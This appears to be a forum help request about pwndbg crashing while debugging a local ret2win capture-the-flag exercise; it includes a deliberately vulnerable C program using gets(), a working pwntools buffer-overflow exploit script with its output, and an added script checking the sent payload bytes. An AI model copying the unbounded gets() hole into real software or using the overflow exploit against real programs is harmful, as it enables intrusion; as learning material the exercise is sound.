OS: Arch Linux x86_64
Here is my source code:
// gcc source.c -o vuln -no-pie -fno-stack-protector -z execstack -m32
#include <stdio.h>
// Deliberately vulnerable: gets() has no length limit, so input longer than
// 40 bytes runs over the saved frame pointer and the saved return address.
void unsafe() {
char buffer[40];
puts("Overflow me");
gets(buffer);
}
void main() {
unsafe();
}
// Never called from main(); the exploit redirects the return address here.
void flag() {
puts("Exploited!!!!!");
}
Here is my exploit script:
from pwn import *
# The binary is built with -m32, so the target is i386 (the original script said amd64).
context(os='linux', arch='i386', log_level='debug')
context.terminal = ['alacritty', '-e']
p = process('./vuln')
gdb.attach(p, 'b *0x080491aa')  # hard-coded breakpoint address from this build of vuln
payload = b'A' * 52             # 52 bytes reach the saved return address (buffer, padding, saved ebp)
payload += p32(0x080491c3)      # overwrite it with the address of flag()
pause()
p.sendline(payload)
p.interactive()
Here are the commands I used in the pwndbg window:
pwndbg> r
Starting program: /home/cub3y0nd/Downloads/ret2win/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Overflow me
After the `r` command, I send the line from the exploit side and pwndbg crashes. Here is the output on the exploit side:
λ ~ python exp.py
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb']
[DEBUG] Created script for new terminal:
#!/usr/bin/python
import os
os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb'], os.environ)
[DEBUG] Launching a new terminal: ['/usr/bin/alacritty', '-e', '/tmp/tmpikuhhld1']
[+] Waiting for debugger: Done
[*] Paused (press any to continue)
[DEBUG] Sent 0x39 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000030 41 41 41 41 c3 91 04 08 0a │AAAA│····│·│
00000039
[*] Process './vuln' stopped with exit code -9 (SIGKILL) (pid 175664)
Traceback (most recent call last):
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 702, in send_raw
self.proc.stdin.flush()
BrokenPipeError: [Errno 32] Broken pipe
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/cub3y0nd/Downloads/ret2win/exp.py", line 16, in <module>
p.sendline(payload)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 816, in sendline
self.send(line + self.newline)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 795, in send
self.send_raw(data)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 704, in send_raw
raise EOFError
EOFError
I tried the same thing on another computer and it works fine; pwndbg does not crash there.
I don't know where the problem is. I tried reinstalling pwndbg and pwntools, but that did not fix it.
Every time I open pwndbg I get this warning:
/usr/share/pwndbg/gdbinit.py:10: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html import pkg_resources
I don't know whether this warning has anything to do with it.
Please tell me how to fix this pwndbg hook debugging problem.
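As an added example (not part of the original post), the following script checks that the bytes pwntools reports as sent in the `[DEBUG] Sent 0x39 bytes` dump above are exactly the ret2win payload the script builds, plus the newline that `sendline()` appends. It reconstructs the bytes from the pwntools-style hexdump (expanding the `*` row that marks repeated lines) and rebuilds the payload from the stack layout. The value `BUF_TO_SAVED_EBP = 48` is an assumption inferred from the 52-byte padding in the script (48 bytes from the start of `buffer` to the saved `ebp`, plus 4 for the saved `ebp` itself); it is not stated in the post. The address of `flag()` is the one the script uses.

```python
import struct

# Constructed from the pwntools debug output quoted in the post above.
SENT_HEXDUMP = """\
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000030 41 41 41 41 c3 91 04 08 0a │AAAA│····│·│
00000039"""

FLAG_ADDR = 0x080491c3      # address of flag() used by the exploit script
BUF_TO_SAVED_EBP = 48       # assumed: distance from buffer[0] to the saved ebp (inferred from 52 - 4)


def ret2win_payload(buf_to_saved_fp: int, target: int, bits: int = 32) -> bytes:
    """Pad from the start of the buffer over the saved frame pointer, then overwrite
    the saved return address with `target`, little-endian, sized for `bits`."""
    word = bits // 8
    fmt = "<I" if bits == 32 else "<Q"
    padding = buf_to_saved_fp + word     # saved fp sits directly below the return address
    return b"A" * padding + struct.pack(fmt, target)


def parse_pwntools_hexdump(dump: str) -> bytes:
    """Rebuild the raw bytes from a pwntools hexdump.

    Each row is `<offset> <hex bytes...> │ascii│`; a lone `*` means the previous
    16-byte row repeats until the offset of the next row; the final row holds
    only the total length."""
    out = bytearray()
    prev_row = b""
    repeat_pending = False
    for line in dump.splitlines():
        line = line.strip()
        if not line:
            continue
        if line == "*":
            repeat_pending = True
            continue
        fields = line.split("│", 1)[0].split()
        offset = int(fields[0], 16)
        row = bytes(int(b, 16) for b in fields[1:])
        if repeat_pending:
            while len(out) < offset:
                out += prev_row
            repeat_pending = False
        if len(out) != offset:
            raise ValueError(f"offset {offset:#x} does not match {len(out)} bytes parsed so far")
        out += row
        prev_row = row
    return bytes(out)


def sent_matches_payload(dump: str = SENT_HEXDUMP) -> bool:
    """True if the dumped bytes equal payload + b'\\n' (sendline's newline)."""
    expected = ret2win_payload(BUF_TO_SAVED_EBP, FLAG_ADDR) + b"\n"
    return parse_pwntools_hexdump(dump) == expected


if __name__ == "__main__":
    sent = parse_pwntools_hexdump(SENT_HEXDUMP)
    print(f"{len(sent):#x} bytes sent; return address bytes: {sent[52:56].hex()}")
    print("dump matches payload + newline:", sent_matches_payload())
```

The trailing `0a` in the dump is the newline `sendline()` adds; `gets()` consumes it as the line terminator, so it never lands in `buffer`, and the 4 bytes before it (`c3 91 04 08`) are `0x080491c3` in little-endian order, exactly where the saved return address of `unsafe()` is expected to sit. If the dump ever disagrees with the rebuilt payload, the offset or the target address is wrong before any debugger is involved.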
I solved this by reinstalling pwntools with pipx.